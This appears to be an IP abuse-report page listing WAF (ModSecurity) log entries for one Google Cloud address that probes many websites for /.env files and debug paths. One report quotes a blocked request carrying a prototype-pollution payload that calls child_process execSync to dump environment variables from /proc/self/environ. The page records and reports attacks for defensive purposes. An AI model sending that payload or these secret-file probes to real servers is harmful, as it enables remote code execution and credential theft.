๐บ๐ธ
TPI-Abuse
2026-09-30 04:44:01
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Sep 30 00:43:53.081811 2026] [security2:error] [pid 10184:tid 10184] [client 34.19.203.243:48858] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.kircali.net"] [uri "/.env.example"] [unique_id "aryTic3_NpfkAWSrNYKdUAAAAAU"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-30 02:43:31
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 22:43:26.762391 2026] [security2:error] [pid 14471:tid 14471] [client 34.19.203.243:41040] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "noxiousthoughts.com"] [uri "/.env"] [unique_id "arx3TphT9WJs4ypYfC2H4AAAAAM"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-30 01:59:06
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 21:58:58.456477 2026] [security2:error] [pid 7150:tid 7230] [client 34.19.203.243:32988] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "autodiscover.kd2lst.us"] [uri "/public/.env"] [unique_id "arxs4rlud-zucnB4YwyhDAAAAQ8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-30 01:39:30
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 21:39:26.221931 2026] [security2:error] [pid 21755:tid 21755] [client 34.19.203.243:38068] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "4"] [msg "COMODO WAF: URL file extension is restricted by policy||macryder.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "macryder.com"] [uri "/z9x8c7v6b5-debug-trigger-macryder.com"] [unique_id "arxoTm1Lf1RTeN57EhwB8QAAAAg"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-30 01:12:22
(1 day ago)
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 21:12:16.558469 2026] [security2:error] [pid 21090:tid 21099] [client 34.19.203.243:56986] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "justwondering.net"] [uri "/.env.example"] [unique_id "arxh8PaRMwdfGP80bvLPkAAAAUc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-30 00:18:15
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 20:18:07.669064 2026] [security2:error] [pid 10284:tid 10284] [client 34.19.203.243:55680] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||autodiscover.mbehel.com|F|2"] [data ".mbehel.com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "autodiscover.mbehel.com"] [uri "/z9x8c7v6b5-debug-trigger-autodiscover.mbehel.com"] [unique_id "arxVP9s8vTh-nOL2aUk3WwAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐จ๐ญ
4server
2026-09-30 00:10:06
(1 day ago)
[WedSep3002:10:00.7283262026][security2:error][pid1292021:tid1292117][client34.19.203.243:0]ModSecur ...
show more
[WedSep3002:10:00.7283262026][security2:error][pid1292021:tid1292117][client34.19.203.243:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Matchedphrase\"proc/self/\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"135\"][id\"344360\"][rev\"5\"][msg\"Atomicorp.comWAFRules:UnauthorizedOperatingSystemFileAccessAttempt\"][data\"MatchedData:proc/self/foundwithinARGS:0:{\\\\x22then\\\\x22:\\\\x22\$1:__proto__:then\\\\x22\,\\\\x22status\\\\x22:\\\\x22resolved_model\\\\x22\,\\\\x22reason\\\\x22:-1\,\\\\x22value\\\\x22:\\\\x22{/\\\\x22then/\\\\x22:/\\\\x22\$b1337/\\\\x22}\\\\x22\,\\\\x22_response\\\\x22:{\\\\x22_prefix\\\\x22:\\\\x22process.mainmodule.require\(\'child_process\'\).execsync\(\'env2\>/dev/null\|\|cat/proc/self/environ2\>/dev/null\'\)\;\\\\x22\,\\\\x22_formdata\\\\x22:{\\\\x22get\\\\x22:\\\\x22\$1:constructor:constructor\\\\x22}}}\"][severity\"CRITICAL\"][tag\"attack-lfi\"][hostname\"autodiscover.lemox.ch\"][uri\"/\"][unique_id\"arxTWPB-4PbL0hwwxgk4xAAAARA\"]
show less
Hacking
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-30 00:03:13
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 20:03:09.133893 2026] [security2:error] [pid 3068:tid 3068] [client 34.19.203.243:59294] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "4"] [msg "COMODO WAF: URL file extension is restricted by policy||kontikimotorcycles.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "kontikimotorcycles.com"] [uri "/z9x8c7v6b5-debug-trigger-kontikimotorcycles.com"] [unique_id "arxRvWnXneyn5xCIIaWClgAAABk"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ณ๐ฑ
Site.eu
2026-09-29 23:38:44
(1 day ago)
Excessive multi-domain requests
Brute-Force
Anonymous
2026-09-29 23:10:11
(1 day ago)
| Multiple common web attacks from same source ip. (multiple servers)
Web App Attack
Hacking
SQL Injection
๐บ๐ธ
TPI-Abuse
2026-09-29 22:33:44
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 18:33:36.718538 2026] [security2:error] [pid 29446:tid 29446] [client 34.19.203.243:36756] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||autodiscover.nolafoodporn.com|F|2"] [data ".nolafoodporn.com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "autodiscover.nolafoodporn.com"] [uri "/z9x8c7v6b5-debug-trigger-autodiscover.nolafoodporn.com"] [unique_id "arw8wMkVsFFPw2aaq3nvPAAAABE"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-09-29 21:39:05
(1 day ago)
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 34.19.203.243 (243.203.19.34.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 29 17:38:59.137351 2026] [security2:error] [pid 3408:tid 3408] [client 34.19.203.243:49692] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||juyla.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "juyla.com"] [uri "/z9x8c7v6b5-debug-trigger-juyla.com"] [unique_id "arwv80O--mr7paIoLZgshQAAAC0"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ซ๐ท
dynamix
2026-09-29 21:34:59
(1 day ago)
Multiple WAF Violations
Web App Attack
๐ณ๐ฑ
Site.eu
2026-09-29 21:34:02
(1 day ago)
Excessive 404/403 errors
Brute-Force
๐ซ๐ฎ
sibahota
2026-09-29 21:21:41
(1 day ago)
34.19.203.243 - - [29/Sep/2026:21:21:39 +0000] nidandiagnostic.com "GET /z9x8c7v6b5-debug-trigger-ni ...
show more
34.19.203.243 - - [29/Sep/2026:21:21:39 +0000] nidandiagnostic.com "GET /z9x8c7v6b5-debug-trigger-nidandiagnostic.com HTTP/2.0" 404 6649 0.004 "-" "Mozilla/5.0 (compatible; ChatGLM-Spider/1.0; +https://zhipuai.cn/)" 172.17.0.1:3051 404 0.004 "http://nidandiagnostic.com/z9x8c7v6b5-debug-trigger-nidandiagnostic.com"
34.19.203.243 - - [29/Sep/2026:21:21:39 +0000] nidandiagnostic.com "GET /_next/static/buildManifest.js HTTP/2.0" 404 9 0.001 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Mobile Safari/537.36 EdgA/152.0.0.0" 172.17.0.1:3051 404 0.001 "http://nidandiagnostic.com/_next/static/buildManifest.js"
34.19.203.243 - - [29/Sep/2026:21:21:39 +0000] nidandiagnostic.com "GET /_next/build-manifest.json HTTP/2.0" 404 6649 0.004 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Mobile Safari/537.36 EdgA/152.0.0.0" 172.17.0.1:3051 404 0.005 "http://nidandiagnostic.com/_next/build-manifest.json"
34.
...
show less
Bad Web Bot
Web App Attack